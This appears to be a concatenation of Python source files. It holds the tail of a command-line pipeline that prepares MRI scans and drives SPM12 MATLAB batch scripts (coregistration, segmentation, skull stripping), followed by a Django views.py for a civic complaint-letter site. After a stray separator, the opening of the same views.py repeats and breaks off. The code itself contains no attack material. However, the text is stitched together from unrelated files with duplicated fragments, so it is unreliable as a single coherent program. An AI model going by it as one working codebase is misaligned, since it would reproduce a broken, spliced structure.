            results.append(m.groups() if group_index is None else m.group(group_index))
    return results
class spm12_input_dict:
    """Discover MRI image files for patients under a root folder.

    The result is exposed via ``self.values`` as a nested dict:
    ``{patient_id: {scan_date: {scan_type: file_path}}}``.

    Parameters
    ----------
    root_folder : str
        Folder searched recursively for image files.
    img_types : list[str]
        Scan types to collect (e.g. ['t1ce', 't1', 't2', 'flair', 'seg']).
    pid : 'all' | list[str] | int | None
        Patient id(s); 'all' collects every 8-digit id found on disk.
    file_extension : str
        File suffix to search for (e.g. '.nii' or '.nii.gz').
    """
    def __init__(self, root_folder, img_types, pid = None, file_extension = ".nii"):
        self.root_folder = os.path.abspath(root_folder)
        self.img_types = img_types
        self.file_extension = file_extension
        self.fep = re.sub("\.", "\\.", file_extension) # file_extension_pattern (dots escaped for regex use)
        self.set_input_dict(root_folder, img_types, pid)
    def __str__(self):
        return self.values.__str__()
    def __repr__(self):
        return self.values.__repr__()
    def set_input_dict(self, root_folder, img_types, pid):
        """Populate ``self.pid`` and ``self.values`` by scanning the filesystem.

        Raises ValueError when no candidate files (or no unambiguous file per
        scan type) can be found for a patient/date.
        """
        root_folder = os.path.abspath(root_folder)
        tfl1 = glob.glob(f"{root_folder}/**/*{self.file_extension}", recursive = True) # temp file list 1
        # modify pid variable: 'all' -> every 8-digit id found; int -> one-element list.
        if (pid == 'all') or (pid == ['all']):
            pid = set(if_found_return_groups("[0-9]{8}", tfl1, 0))
        elif isinstance(pid, int):
            pid = [str(pid)]
        elif pid is None:
            raise ValueError(f"pid should be given.")
        self.pid = pid
        input_dict = dict.fromkeys(self.pid)
        for i in input_dict:
            gr1 = glob.glob(f"{root_folder}/**/{i}/**/*{self.file_extension}", recursive = True)
            if len(gr1) == 0: raise ValueError(f"gr1 has nothing. {i}\n{gr1}")
            # Unless explicitly searching for processed "_final" files, drop SPM
            # intermediates (r*/m*/c*/mean* prefixes), masks and final products.
            if re.search("_final.nii", self.file_extension) is None:
                gr1 = list(filter(lambda x:re.search("/(?:[rmc]{1,2}|mean).*" + self.fep, x) is None, gr1))
                gr1 = list(filter(lambda x:re.search("/[^\n/]*mask" + self.fep, x, re.I) is None, gr1))
                gr1 = list(filter(lambda x:re.search("/.*_final" + self.fep, x) is None, gr1))
            else:
                pass
            if len(gr1) == 0: raise ValueError(f"gr1_2 has nothing. {i}\n{gr1}")
            # Scan dates appear as YYYY-MM-DD / YYYYMMDD folders below the patient id.
            ifr1 = set(if_found_return_groups("[0-9]{8}/([0-9]{4}[-]?[0-9]{2}[-]?[0-9]{2})", gr1, group_index = 1))
            if len(ifr1) == 0: raise ValueError(f"ifr1 has nothing. {i}\nifr1:{ifr1}\ngr1:{gr1}")
            input_dict[i] = dict.fromkeys(ifr1)
            for j in input_dict[i]:
                td = {}
                for t in img_types:
                    # BUGFIX: compute tt for every scan type.  Previously it was only
                    # assigned in the non-'seg' branch, so building the error message
                    # in the 'seg' branch could raise NameError and mask the real error.
                    tt = 't1' if t == 't1ce' else t
                    if t != 'seg':
                        tl = if_found_return_groups("^((?!roi|seg|label|RL).)*$",
                                                    if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/{t}/[^/\n]*{self.fep}", gr1, 0, re.I),
                                                    0,
                                                    re.I)
                        if len(tl) == 1:
                            td[t] = tl[0]
                        else:
                            raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
                    else:
                        # Segmentation files live directly under the date folder and
                        # carry roi/seg/label somewhere in their name.
                        tl = if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/[^/\n]*(?:roi|seg|label)[^/\n]*{self.fep}", gr1, 0, re.I)
                        if len(tl) == 1:
                            td[t] = tl[0]
                        else:
                            raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
                input_dict[i][j] = td
        self.values = input_dict
### Gunzip functions
def flatten_dict(d):
    """Flatten nested dicts (and lists of dicts) into one level, joining keys with '_'.

    Adapted from:
    https://stackoverflow.com/questions/52081545/python-3-flattening-nested-dictionaries-and-lists-within-dictionaries
    """
    result = {}
    for key, val in d.items():
        candidates = [val] if isinstance(val, dict) else val
        if isinstance(candidates, list):
            for entry in candidates:
                for sub_key, sub_val in flatten_dict(entry).items():
                    result[key + '_' + sub_key] = sub_val
        else:
            result[key] = val
    return result
def gunzip_nii_gz_files(root_folder, scan_types, patient_id):
    """Decompress every matching .nii.gz image under *root_folder* into a .nii sibling."""
    compressed_index = spm12_input_dict(root_folder, scan_types, patient_id, ".nii.gz")
    compressed_index.values = flatten_dict(compressed_index.values)
    for gz_path in compressed_index.values.values():
        nii_path = re.sub("\.nii\.gz", ".nii", gz_path)  # same path, .nii suffix
        logger.info(f"Gunzip {gz_path} to {nii_path} ...")
        with gzip.open(gz_path, 'r') as gz_in, open(nii_path, 'wb') as nii_out:
            shutil.copyfileobj(gz_in, nii_out)
    logger.info(">>> Gunzip complete.")
def gzip_nii_files(root_folder, scan_types, patient_id, nii_file_pattern = "_final.nii"):
    """Compress .nii files matching *nii_file_pattern* under *root_folder* into .nii.gz siblings."""
    plain_index = spm12_input_dict(root_folder, scan_types, patient_id, nii_file_pattern)
    plain_index.values = flatten_dict(plain_index.values)
    for nii_path in plain_index.values.values():
        gz_path = re.sub("\.nii", ".nii.gz", nii_path)  # same path, .nii.gz suffix
        logger.info(f"Gzip {nii_path} ...")
        with open(nii_path, 'rb') as nii_in, gzip.open(gz_path, 'wb') as gz_out:
            shutil.copyfileobj(nii_in, gz_out)
    logger.info(">>> Gzip complete.")
### Convert Functions
def convert_mscript(process, inputs):
    """
    Rewrite a template SPM12 MATLAB batch script so its input fields point at
    *inputs*, wrap it in an spm_jobman runner, and write it to a temporary .m
    file.

    Parameters
    ----------
    process : name of the template script inside args.m_script_archive; one of
        'realignment', 'coregistration', 'segment', 'segment_only_t1_cleanup',
        'segment_only_t1_no-cleanup', 'imgcalc_mask', 'imgcalc'.
    inputs : list of filesystem paths substituted into the template.

    Returns
    -------
    Path of the generated temporary MATLAB script (the caller removes it).
    """
    # MATLAB cell-array entries must be quoted strings.
    inputs = list(map(lambda x:f"'{x}'", inputs))
    with open(f"{args.m_script_archive}/{process}.m", 'r') as f:
        contents = f.read()
    logger.info(f"Before converting script:\n{contents}\n")
    # Edit Realignment script
    # inputs will be T1 + seg or T2
    if process == 'realignment':
        inputs_string = '\n' + '\n'.join(inputs) + '\n'
        # Replace the whole quoted cell array with the new input list.
        ir = re.sub("\{[^{]*'.+'[^}]*\}", f"{{{inputs_string}}}", contents)
        logger.info("Below the if realignment sentence constructure")
    # Edit Coregistration script
    # inputs will be T1 + T2; extra entries (if any) go into the .other field.
    if process == 'coregistration':
        ir = re.sub("(\.ref = ){'.+'}", f"\g<1>{{{inputs[0]}}}", contents)
        ir = re.sub("(\.source = ){'.+'}", f"\g<1>{{{inputs[1]}}}", ir)
        if len(inputs) > 2:
            try:
                input_strings = '\n' + '\n'.join(inputs[2:]) + '\n'
                ir = re.sub("(\.other = ){'.*'}", f"\g<1>{{{input_strings}}}", ir)
            except IndexError:
                pass
        logger.info("Below the if coregistration sentence constructure")
    # Edit segment script
    # inputs will be T1 + T2; one .channel(N).vols entry per input.
    if process == 'segment':
        ir = contents
        for i in range(len(inputs)):
            ir = re.sub(f"(\.channel\({i+1}\).vols = ){{'.+'}}", f"\g<1>{{{inputs[i]}}}", ir)
        ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
        logger.info("Below the if segment sentence constructure")
    if (process == 'segment_only_t1_cleanup') or (process == 'segment_only_t1_no-cleanup'):
        ir = contents
        logger.info("ir = contents")
        # Single-channel variant: only the first input is substituted.
        ir = re.sub(f"(\.channel.vols = ){{'[^\n{{}}]+'}}", f"\g<1>{{{inputs[0]}}}", ir)
        logger.info('''ir = re.sub(f"(\.channel.vols = ){{'[^\n{{}}]+'}}", f"\g<1>{{{inputs[0]}}}", ir)''')
        ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
        logger.info("Below the if segment_only_t1_cleanup sentence constructure")
    # Edit imgcalc script (mask output variant)
    # inputs[:4] = operands, inputs[4] = output name, inputs[5] = output dir.
    if process == 'imgcalc_mask':
        inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
        ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
        ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
        ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
        logger.info("Below the if img calc mask sentence constructure")
    # Edit imgcalc script
    # inputs[:4] = operands, inputs[4] = output name, inputs[5] = output dir.
    if process == 'imgcalc':
        inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
        ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
        ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
        ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
        logger.info("Below the if img calc sentence constructure")
    # NOTE(review): if *process* matches none of the branches above, 'ir' is
    # unbound and the f-string below raises NameError — confirm callers only
    # pass the names listed in the docstring.
    edited_contents = f'''
spm defaults fmri
spm_jobman initcfg
{ir}
spm_jobman('run',matlabbatch);
'''
    logger.info("edited_contents variable was made.")
    logger.info(f"After converting script:\n{edited_contents}\n")
    logger.info(f'''Running {process.upper()} with inputs:{inputs}''')
    # The NamedTemporaryFile is only used to reserve a unique name; the actual
    # script is written to "<name>.m" after the handle is closed.
    ts_file = tempfile.NamedTemporaryFile(prefix = f"{process}_") # temp script file
    tfn = ts_file.name
    ts_file.close()
    with open(f"{tfn}.m", 'w') as f:
        f.write(edited_contents)
    return f"{tfn}.m"
### Resample functions
def resample_mri(input_path, voxel_size = [1, 1, 1], output_path_modifier = r"/\g<1>_resampled\g<2>"):
    """
    Resample an MRI NIfTI file to *voxel_size* and save the result.

    Parameters
    ----------
    input_path : path of the source .nii / .nii.gz file.
    voxel_size : target voxel dimensions passed to nibabel.
    output_path_modifier : re.sub replacement applied to the last path
        component ("name" -> group 1, extension -> group 2) to build the
        output path.
    """
    # Raw strings so the "\g<n>" backreferences and "\." reach re untouched
    # instead of being (deprecated) string-literal escapes.
    output_path = re.sub(r"/([^/\n]+)(\.[^.\n]+?)$", output_path_modifier, input_path)
    logger.info(f"resample_mri: output_path = {output_path}")
    input_img = nibabel.load(input_path)
    resampled_img = nibabel.processing.resample_to_output(input_img, voxel_size)
    nibabel.save(resampled_img, output_path)
### Run functions
def _run_m_script(m_script, MCR_path=args.mcr_path):
    """
    Run one SPM12 MATLAB batch script through the MCR runner; raise on failure.

    Note: the default MCR_path is captured from the global `args` at function
    definition time (by design for this CLI script).
    """
    cmd1 = f'''run_spm12.sh {MCR_path} script {m_script}'''
    logger.info(f"running the following command:\n{cmd1}")
    # Pipe stderr as well: the original only piped stdout, so the
    # "Stderr:" log line below always printed None.
    p1 = Popen(shlex.split(cmd1), stdout=PIPE, stderr=PIPE)
    p1_stdout, p1_stderr = p1.communicate()
    if p1.returncode != 0:
        logger.info(f"Stdout:\n{p1_stdout}")
        logger.info(f"Stderr:\n{p1_stderr}")
        logger.info(f"Return code: {p1.returncode}")
        raise Exception("Job failed.")
def run_spm12_process(input_dict):
    """
    Run the SPM12 chain for every patient and scan date in *input_dict*:
    optional resample -> coregistration -> segmentation -> two T1-only
    segmentations (cleanup / no-cleanup masks) -> imgcalc skull stripping ->
    mask export.

    input_dict : spm12_input_dict whose .values maps
        patient id -> scan date -> image type -> file path.

    Side effects: writes and renames NIfTI files next to the inputs and runs
    MATLAB (via _run_m_script) for every generated batch script.
    """
    # Name-based check instead of isinstance so instances created from a
    # reloaded module are still accepted.
    if input_dict.__class__.__name__ != spm12_input_dict.__name__: raise ValueError("input_dict should be an instance of spm12_input_dict class.")
    pid = input_dict.pid
    input_data = input_dict.values
    img_types = input_dict.img_types
    for p in pid:
        logger.info(f"Current patient id: {p}.")
        for ts in input_data[p]: # ts = time series
            logger.info(f"MRI Image date: {ts}")
            # run realignment (deliberately disabled)
            # for t in img_types[:-1]:
            # if t == 't1ce':
            # inputs = [input_data[p][ts][t]]
            # m_script = convert_mscript("realignment", inputs)
            # _run_m_script(m_script) # T1 & label realignment
            # os.remove(m_script)
            # else:
            # inputs = [input_data[p][ts][t]]
            # m_script = convert_mscript("realignment", inputs)
            # _run_m_script(m_script) # T2 realignment
            # os.remove(m_script)
            # resample t1ce (in place) and seg (to a *_final file) when requested
            if args.resample is True:
                resample_mri(input_data[p][ts]['t1ce'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
                resample_mri(input_data[p][ts]['seg'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_final\g<2>")
            # Make temp img types(excluding seg); move 't1' to the front.
            tit = deepcopy(img_types) #temp img types
            tit.remove('t1')
            tit.insert(0, 't1')
            try:
                tit.remove('seg')
            except:
                logger.info(f"temp img types doesn't have 'seg'.")
            # run coregistration: every non-t1ce image is registered to t1ce
            for t in tit:
                if t == 't1ce':
                    continue
                inputs = [input_data[p][ts]['t1ce'], input_data[p][ts][t]]
                m_script = convert_mscript("coregistration", inputs)
                _run_m_script(m_script) # T1 & T2 coregistration
                os.remove(m_script)
            if img_types[-1] == 'seg':
                shutil.move(input_data[p][ts]['seg'], re.sub("/([^\n/]*)\.nii", "/\g<1>_RL_final.nii", input_data[p][ts]['seg'])) # For consistency of the names of final products.
            # run segment on t1ce plus the coregistered (r-prefixed) images
            inputs = []
            for i in range(len(tit)):
                t = tit[i]
                if t == 't1ce':
                    inputs.append(input_data[p][ts][t])
                else:
                    # SPM's coregistration writes its output with an "r" prefix.
                    inputs.append(re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts][t]))
            # ### lines for resample(not segment)
            # for ri in inputs:
            # resample_mri(ri, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
            # ###
            m_script = convert_mscript("segment", inputs)
            _run_m_script(m_script) # T1 & T2 segment
            os.remove(m_script)
            # Make mask for stripping skull(clean up).
            inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
            logger.info(f"inputs for clean up segment were made.")
            m_script = convert_mscript("segment_only_t1_cleanup", inputs)
            logger.info(f"m_script was made.")
            _run_m_script(m_script) # segment T1 only
            logger.info(f"running m_script complete.")
            os.remove(m_script)
            # Rename c* files(clean up): tag fresh tissue maps with _cleanup so
            # the no-cleanup pass below can tell its own outputs apart.
            cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
            for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
                nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_cleanup.nii", file) # new name
                shutil.move(file, nn)
                logger.info(f"{file} was renamed to {nn}.")
            # Make mask for stripping skull(no clean up).
            inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
            m_script = convert_mscript("segment_only_t1_no-cleanup", inputs)
            _run_m_script(m_script) # segment T1 only
            os.remove(m_script)
            # Rename c* files(no clean up).
            cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
            for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
                nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_no-cleanup.nii", file) # new name
                shutil.move(file, nn)
                logger.info(f"{file} was renamed to {nn}.")
            # run imgcalc(skull stripping) per image type: bias-corrected image
            # (m/mr prefix) masked by the c1-c3 cleanup tissue maps.
            for i in range(len(tit)):
                t = tit[i]
                if t == 't1ce':
                    inputs = re.sub(f"/([^\n/]+\.nii)", "/m\g<1>", input_data[p][ts][t])
                else:
                    inputs = re.sub(f"/([^\n/]+\.nii)", "/mr\g<1>", input_data[p][ts][t])
                # Note: the RHS below still reads the string `inputs` while
                # rebinding it to the full argument list.
                inputs = [inputs] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                    + [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                    + [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                    + [re.sub(f"^.*/([^\n/]+)\.nii", "\g<1>_BrainExtractionBrain_final.nii", inputs)]\
                    + [re.search(f"(^.+)/([^\n/]+\.nii)", inputs).group(1)]
                m_script = convert_mscript("imgcalc", inputs)
                _run_m_script(m_script) # T1 & T2 imgcalc
                os.remove(m_script)
            # Save mask nii file (reuses the last loop iteration's first operand).
            inputs = [inputs[0]] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                + [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                + [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                + ["BrainExtractionMask.nii"]\
                + [re.search(f"(^.+)/([^\n/]+\.nii)", input_data[p][ts]['t1ce']).group(1)]
            m_script = convert_mscript("imgcalc_mask", inputs)
            _run_m_script(m_script) # T1 & T2 imgcalc
            os.remove(m_script)
    logger.info(f">> SPM Process complete.")
def run_spm12(root_folder, img_types, pid):
    """
    End-to-end SPM12 pipeline for one patient: gunzip inputs, run the SPM
    processing chain, then gzip the final products and the extraction mask.

    img_types is reordered so 't1ce' is processed first and 'seg' last; the
    caller's list is left untouched (the original mutated it in place).
    """
    img_type_ref = ['t1ce', 't1', 't2', 'flair', 'seg']
    for i in img_types:
        if i not in img_type_ref:
            raise ValueError(f"Invalid img type. Ref = {img_type_ref}.")
    # Work on a copy so reordering is not a visible side effect on the caller.
    img_types = list(img_types)
    if 'seg' in img_types:
        img_types.remove('seg')
        img_types.append('seg')  # 'seg' must come last
    if 't1ce' in img_types:
        img_types.remove('t1ce')
        img_types.insert(0, 't1ce')  # 't1ce' must come first
    gunzip_nii_gz_files(root_folder, img_types, pid)
    input_dict = spm12_input_dict(root_folder, img_types, pid)
    run_spm12_process(input_dict)
    gzip_nii_files(root_folder, img_types, pid, nii_file_pattern = "_final.nii")
    gzip_nii_files(root_folder, ['t1ce'], pid, nii_file_pattern = "Mask.nii")
    logger.info(">> The whole processes complete.")
def communicate_subprocesses(subpcs, pids, return_code_dict):
    """
    Poll each child process once (non-blocking) and record any newly
    available return codes in *return_code_dict*.

    Popen.poll() returns None while the child is still running and never
    raises TimeoutExpired, so the original try/except around it was dead code.

    Returns the (mutated) return_code_dict.
    """
    for sp, pid in zip(subpcs, pids):
        rc = sp.poll()
        if rc != return_code_dict[pid]:
            logger.info(f"The return code of process of {pid}: {rc}")
            return_code_dict[pid] = rc
    return return_code_dict
# CLI dispatch: run the sub-command selected on the command line.
if args.command == 'convert':
    convert_mscript(args.m_script, args.output)
    logger.info("Converting process complete.")
elif args.command == 'gunzip':
    gunzip_nii_gz_files(args.root_folder, args.scan_types, args.patient_id)
elif args.command == 'resample':
    resample_mri(args.input_path, args.voxel_size)
elif args.command == 'run':
    logger.info(f"patient id : {args.patient_id}")
    subpcs = []
    args.root_folder = os.path.abspath(args.root_folder)
    args.m_script_archive = os.path.abspath(args.m_script_archive)
    # Multiple patients (or 'all'): fan out one worker subprocess per patient
    # and poll them until every one has exited.
    if (len(args.patient_id) > 1) or (args.patient_id == ['all']):
        if args.patient_id == ['all']:
            # Patient ids are the 8-digit groups found in the .nii.gz paths.
            pids = set(if_found_return_groups("[0-9]{8}", glob.glob(f"{args.root_folder}/**/*.nii.gz", recursive = True), 0))
            pids = list(pids)
        else:
            pids = args.patient_id
            assert len(args.patient_id) == len(pids), "Found patient ids were not matched to input patient ids."
        os.makedirs(f"{args.root_folder}/spm12_logs", exist_ok=True)
        # One slot per patient; None means "still running".
        return_code_dict = dict.fromkeys(pids)
        for pid in pids:
            logger.info(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split())
            subpcs.append(
                Popen(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split(),
                      stdout = DEVNULL, stderr = DEVNULL, cwd = os.getcwd())
            )
        # Poll every 5 s until all workers have reported a return code.
        while None in return_code_dict.values():
            return_code_dict = communicate_subprocesses(subpcs, pids, return_code_dict)
            time.sleep(5)
        logger.info(f"Job orders: {pids}")
        logger.info(f"Exit codes: {return_code_dict.items()}")
    # Single patient id (an 8-digit string): run the pipeline in-process.
    elif (len(args.patient_id) == 1) and (re.search("[0-9]{8}", args.patient_id[0]) is not None):
        run_spm12(args.root_folder, args.scan_types, args.patient_id)
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views import generic
from .forms import ContactForm
from django.core.mail import send_mail, BadHeaderError
from .models import Suggestions, Comment, UserProfile, Post, Category, Favorite
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.auth import logout
# Create your views here.
class IndexView(generic.TemplateView):
    """Landing page: renders the static home template."""
    template_name = 'home/index.html'
def accounts_view(request):
    """Render the static accounts page."""
    return render(request, "accounts.html")
def categories(request):
    """List every Category on the categories page."""
    all_categories = list(Category.objects.all())
    # The context key keeps the historical 'catgories' spelling that
    # categories.html expects.
    return render(request, "categories.html", {'catgories': all_categories})
def singleCategory(request, categorySlug):
    """Show every post belonging to the category identified by *categorySlug*."""
    selected_category = Category.objects.get(slug=categorySlug)
    category_posts = list(Post.objects.filter(category=selected_category))
    return render(request, "posts.html", {'posts': category_posts, 'category': selected_category})
def comment(request, categorySlug, postSlug):
    """Show a post and its comments, pre-filling the commenter's display name."""
    selected_category = Category.objects.get(slug=categorySlug)
    selected_post = Post.objects.get(slug=postSlug)
    post_comments = list(Comment.objects.filter(post=selected_post))
    try:
        # Prefer the name stored on the custom profile when one exists.
        profile = UserProfile.objects.get(user=request.user)
        display_name = profile.my_first_name + ' ' + profile.my_last_name
    except UserProfile.DoesNotExist:
        # Fall back to the names on the built-in auth user.
        display_name = request.user.first_name + ' ' + request.user.last_name
    return render(request, "comment.html", {'post': selected_post, 'comments': post_comments, 'category': selected_category, 'name': display_name})
def postComment(request):
    """Persist a submitted comment, then bounce back to the referring page."""
    form_data = request.POST.copy()
    post_id = form_data['post']
    author_name = form_data['name']
    comment_text = form_data['comments']
    new_comment = Comment()
    new_comment.post = Post.objects.get(id=post_id)
    new_comment.author = author_name
    new_comment.text = comment_text
    new_comment.save()
    return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
def myProfile(request):
    """
    Build the profile-page context, preferring the custom UserProfile data
    and falling back to the built-in auth user fields when no profile exists.
    """
    data = {}
    data['first_name'] = request.user.first_name
    data['last_name'] = request.user.last_name
    data['email'] = request.user.email
    # If the user has a UserProfile, pull from that data.
    try:
        profile = UserProfile.objects.get(user=request.user)
        data['email'] = profile.my_email
        data['first_name'] = profile.my_first_name
        data['last_name'] = profile.my_last_name
        data['phone'] = profile.phone
        data['address'] = profile.address
        data['city'] = profile.city
        data['state'] = profile.state
        data['zip_code'] = profile.zip_code
        data['favorites'] = []
        for fav in Favorite.objects.filter(user=profile):
            # Compare names, not model instances: the original compared the
            # Favorite object against a list of name strings, so the
            # duplicate check never triggered.
            if fav.name not in data['favorites']:
                data['favorites'].append(fav.name)
    # Otherwise keep the standard auth user data set above.
    except UserProfile.DoesNotExist:
        data['email'] = request.user.email
        data['first_name'] = request.user.first_name
        data['last_name'] = request.user.last_name
    data['categories'] = list(Category.objects.all())
    return render(request, "my-profile.html", data)
def myProfileAction(request):
    """
    Create or update the requesting user's UserProfile from the submitted
    form, replacing the stored favorites with the newly chosen ones.
    """
    data_in = request.POST.copy()
    try:
        # Existing profile: drop its favorites so the submission replaces them.
        new_profile = UserProfile.objects.get(user=request.user)
        # Reuse the profile just fetched instead of querying a second time.
        Favorite.objects.filter(user=new_profile).delete()
    except UserProfile.DoesNotExist:
        # First submission: create a profile extending the default auth user.
        new_profile = UserProfile()
        new_profile.user = User.objects.get(id=request.user.id)
    new_profile.my_first_name = data_in['first_name']
    new_profile.my_last_name = data_in['last_name']
    new_profile.my_email = data_in['email']
    new_profile.phone = data_in['phone']
    new_profile.address = data_in['address']
    new_profile.city = data_in['city']
    new_profile.state = data_in['state']
    new_profile.zip_code = data_in['zip_code']
    # Save the profile *before* creating favorites: a brand-new profile must
    # have a primary key before Favorite rows can reference it (the original
    # saved it last, which fails for unsaved related objects).
    new_profile.save()
    # Add every favorite the user chose on the form.
    for fav_name in request.POST.getlist('favorites[]'):
        new_fav = Favorite()
        new_fav.name = fav_name
        new_fav.user = new_profile
        new_fav.save()
    return redirect('/')
def feedback(request):
    """Render the feedback form; on POST, store the message as a Suggestion."""
    categories_list = list(Category.objects.all())
    if request.method == "POST":
        suggestion = Suggestions()
        suggestion.name = request.POST.get('name')
        suggestion.email = request.POST.get('email')
        suggestion.subject = request.POST.get('subject')
        suggestion.message = request.POST.get('message')
        suggestion.save()
        return redirect("/thankyou/")
    return render(request, 'feedback.html', {'categories': categories_list})
def thankyou(request):
    """Render the static thank-you page."""
    return render(request, "thankyou.html")
def logout_view(request):
    """Log the user out, then render the logout confirmation page."""
    logout(request)
    return render(request, "logout.html")
def generate(request):
    """Compose a complaint-letter body from the form input and profile data."""
    data_in = request.POST.copy()
    try:
        # Contact details come from the custom profile when it exists.
        profile = UserProfile.objects.get(user=request.user)
        email = profile.my_email
        first_name = profile.my_first_name
        last_name = profile.my_last_name
        phone = profile.phone
    except UserProfile.DoesNotExist:
        email = request.user.email
        first_name = request.user.first_name
        last_name = request.user.last_name
        phone = '123-456-7890'
    category = data_in['category']
    body = data_in['text']
    level = data_in['level']
    # Assemble the full letter; the wording and whitespace match the
    # original concatenation exactly.
    text = (
        f"To whom it may concern, \n\nMy name is {first_name} {last_name}"
        f" and I am writing to you about the issue of {category}:\n\n\b{body}"
        f"\n\nIf you wish to contact me, my phone number is {phone} and my email address is {email}"
        f".\n\nSincerely, \n{first_name} {last_name}"
    )
    return render(request, "generate.html", {'text': text, 'category': category, 'level': level})
def contact_form(request):
    """
    Show the contact form pre-filled from the user's profile; on a valid POST,
    email the message to the chosen recipient and redirect to the thank-you
    page.
    """
    try:
        user_profile = UserProfile.objects.get(user=request.user)
        email = user_profile.my_email
        first_name = user_profile.my_first_name
        last_name = user_profile.my_last_name
    except UserProfile.DoesNotExist:
        email = request.user.email
        first_name = request.user.first_name
        last_name = request.user.last_name
    form = ContactForm(initial={'email': email, 'name': first_name + ' ' + last_name})
    text = request.GET.get('text', '')
    if request.method == 'POST':
        form = ContactForm(request.POST)
        if form.is_valid():
            # Double quotes inside the f-string: re-using the same quote type
            # is a SyntaxError before Python 3.12 (and this matches the other
            # copy of this view in the project).
            subject = f'Civic Connect Message from: {form.cleaned_data["name"]}'
            dataIn = request.POST.copy()
            message = dataIn["message"]
            sender = "hondacivicsuva@gmail.com"
            recipient_email = dataIn["recipient_email"]
            recipients = [recipient_email]
            try:
                send_mail(subject, message, sender, recipients, fail_silently=True)
            except BadHeaderError:
                return HttpResponse('Invalid header found')
            return redirect("/thankyou/")
    return render(request, "contact.html", {'form': form, 'text': text})
# Contact From/ Sendgrid template taken from: https://github.com/the-kodechamp/django_blog_tutorial/blob/master/blog/templates
| from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views import generic
from .forms import ContactForm
from django.core.mail import send_mail, BadHeaderError
from .models import Suggestions, Comment, UserProfile, Post, Category, Favorite
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.auth import logout
# Create your views here.
class IndexView(generic.TemplateView):
    """Landing page: renders the static home template."""
    template_name = 'home/index.html'
def accounts_view(request):
    """Render the static accounts page."""
    return render(request, "accounts.html")
def categories(request):
    """List every Category on the categories page."""
    all_categories = list(Category.objects.all())
    # The context key keeps the historical 'catgories' spelling that
    # categories.html expects.
    return render(request, "categories.html", {'catgories': all_categories})
def singleCategory(request, categorySlug):
    """Show every post belonging to the category identified by *categorySlug*."""
    selected_category = Category.objects.get(slug=categorySlug)
    category_posts = list(Post.objects.filter(category=selected_category))
    return render(request, "posts.html", {'posts': category_posts, 'category': selected_category})
def comment(request, categorySlug, postSlug):
    """Show a post and its comments, pre-filling the commenter's display name."""
    selected_category = Category.objects.get(slug=categorySlug)
    selected_post = Post.objects.get(slug=postSlug)
    post_comments = list(Comment.objects.filter(post=selected_post))
    try:
        # Prefer the name stored on the custom profile when one exists.
        profile = UserProfile.objects.get(user=request.user)
        display_name = profile.my_first_name + ' ' + profile.my_last_name
    except UserProfile.DoesNotExist:
        # Fall back to the names on the built-in auth user.
        display_name = request.user.first_name + ' ' + request.user.last_name
    return render(request, "comment.html", {'post': selected_post, 'comments': post_comments, 'category': selected_category, 'name': display_name})
def postComment(request):
    """Persist a submitted comment, then bounce back to the referring page."""
    form_data = request.POST.copy()
    post_id = form_data['post']
    author_name = form_data['name']
    comment_text = form_data['comments']
    new_comment = Comment()
    new_comment.post = Post.objects.get(id=post_id)
    new_comment.author = author_name
    new_comment.text = comment_text
    new_comment.save()
